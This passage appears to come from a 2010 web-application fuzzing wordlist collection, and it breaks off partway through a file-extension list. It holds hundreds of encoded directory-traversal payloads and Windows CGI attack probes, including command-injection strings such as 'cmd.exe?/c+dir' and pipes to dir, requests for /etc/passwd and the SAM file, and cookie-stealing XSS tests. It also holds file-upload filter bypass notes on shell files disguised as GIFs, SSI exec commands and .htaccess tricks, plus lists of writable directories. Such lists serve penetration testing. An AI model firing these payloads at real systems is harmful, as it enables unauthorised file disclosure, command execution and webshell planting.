%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010 <br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
